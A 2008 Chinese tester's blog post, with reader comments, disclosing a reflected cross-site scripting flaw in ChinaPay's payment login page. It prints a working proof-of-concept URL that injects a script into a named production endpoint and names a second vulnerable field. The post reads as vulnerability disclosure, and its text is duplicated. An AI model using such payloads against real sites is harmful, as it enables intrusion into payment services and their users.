博主简介:
八年软件测试,五年测试管理,熟悉电商/支付/证券方面测试,研究性能,安全,自动化等测试技术;目前从事互联网金融证券测试!
[原创]银联电子支付chinapay安全性测试漏洞之“跨站脚本注入式攻击”
上一篇 / 下一篇 2008-06-24 09:31:47 / 个人分类:安全性测试
查看( 3284 ) /
评论( 4 )
[原创]银联电子支付chinapay安全性测试漏洞之“跨站脚本注入式攻击”
网站安全性测试,尤为重要,电子支付网站更是如此,本文作者以实例介绍了
(1)“Yeepay网站安全测试漏洞之跨站脚本注入”,原文地址:http://bbs.51testing.com/thread-113784-1-1.html;
(2)“网银在线chinabank安全漏洞之不完善的开发软件包”,原文地址:http://bbs.51testing.com/thread-116660-1-1.html
(3)“支付宝alipay网站安全性测试漏洞之“无辜的备份文件”,原文地址:http://bbs.51testing.com/thread-116821-1-1.html
(4)“支付宝alipay网站安全性测试漏洞之“跨站脚本注入式攻击”,原文地址:http://bbs.51testing.com/thread-116826-1-1.html
(5)“快钱99bill网站安全性测试漏洞之“跨站式脚本注入”,原文地址:http://bbs.51testing.com/thread-116883-1-1.html
(6)“银联电子支付chinapay安全性测试漏洞之“不安全的目录设置”,原文地址:http://bbs.51testing.com/thread-117382-1-1.html
如果你想了解更多软件测试,安全性测试,性能测试,自动化测试,测试管理等知识!欢迎访问我的Blog:卖烧烤的鱼的测试博客:http://mayingbao.cnblogs.com银联电子支付chinapay存在“跨站脚本注入式攻击”,经本文作者验证https://payment.chinapay.com/trf/G_chklogin.jsp此部分存在漏洞,于是构造脚本
:https://payment.chinapay.com/trf/G_chklogin.jsp?EncMsg=>'><scrīpt%20%0a%0d>alert(888888888888888888888)%3B</scrīpt>&ret=mayingbao2002@163.com&IPAddr=61%2E129%2E122%2E135%3A8081%2Ftrf%2F
访问后,弹出如下图
PS:经本文作者验证:https://payment.chinapay.com/trf/G_chklogin.jsp此部分也存在漏洞,其中分析得出最佳祸手为“ txtId ”字段^_^
chinapay2.gif
网站安全性测试,尤为重要,电子支付网站更是如此,本文作者以实例介绍了
(1)“Yeepay网站安全测试漏洞之跨站脚本注入”,原文地址:http://bbs.51testing.com/thread-113784-1-1.html;
(2)“网银在线chinabank安全漏洞之不完善的开发软件包”,原文地址:http://bbs.51testing.com/thread-116660-1-1.html
(3)“支付宝alipay网站安全性测试漏洞之“无辜的备份文件”,原文地址:http://bbs.51testing.com/thread-116821-1-1.html
(4)“支付宝alipay网站安全性测试漏洞之“跨站脚本注入式攻击”,原文地址:http://bbs.51testing.com/thread-116826-1-1.html
(5)“快钱99bill网站安全性测试漏洞之“跨站式脚本注入”,原文地址:http://bbs.51testing.com/thread-116883-1-1.html
(6)“银联电子支付chinapay安全性测试漏洞之“不安全的目录设置”,原文地址:http://bbs.51testing.com/thread-117382-1-1.html
如果你想了解更多软件测试,安全性测试,性能测试,自动化测试,测试管理等知识!欢迎访问我的Blog:卖烧烤的鱼的测试博客:http://mayingbao.cnblogs.com银联电子支付chinapay存在“跨站脚本注入式攻击”,经本文作者验证https://payment.chinapay.com/trf/G_chklogin.jsp此部分存在漏洞,于是构造脚本
:https://payment.chinapay.com/trf/G_chklogin.jsp?EncMsg=>'><scrīpt%20%0a%0d>alert(888888888888888888888)%3B</scrīpt>&ret=mayingbao2002@163.com&IPAddr=61%2E129%2E122%2E135%3A8081%2Ftrf%2F
访问后,弹出如下图
PS:经本文作者验证:https://payment.chinapay.com/trf/G_chklogin.jsp此部分也存在漏洞,其中分析得出最佳祸手为“ txtId ”字段^_^
chinapay2.gif
TAG:
-
阿七 发布于2008-06-18 09:25:38
-
鱼兄 有空出个录像教程哈
^_^
-
QQHao 发布于2008-09-04 11:43:26
-
lz 有空应该交流一下如何做黑客哦
-
flyweb发布于2008-09-04 23:08:17
-
这类注入只是恶作剧摆了
一方面体现在浏览器对Unicode的处理漏洞
另一方面针对表单对特定字符的过滤处理不当
-
lihy2011发布于2011-05-20 09:39:05
-
新手逛园 留个爪爪
标题搜索
日历
|
|||||||||
| 日 | 一 | 二 | 三 | 四 | 五 | 六 | |||
| 1 | 2 | 3 | 4 | 5 | 6 | ||||
| 7 | 8 | 9 | 10 | 11 | 12 | 13 | |||
| 14 | 15 | 16 | 17 | 18 | 19 | 20 | |||
| 21 | 22 | 23 | 24 | 25 | 26 | 27 | |||
| 28 | 29 | 30 | |||||||
我的存档
数据统计
- 访问量: 52324
- 日志数: 27
- 建立时间: 2006-12-12
- 更新时间: 2010-01-14
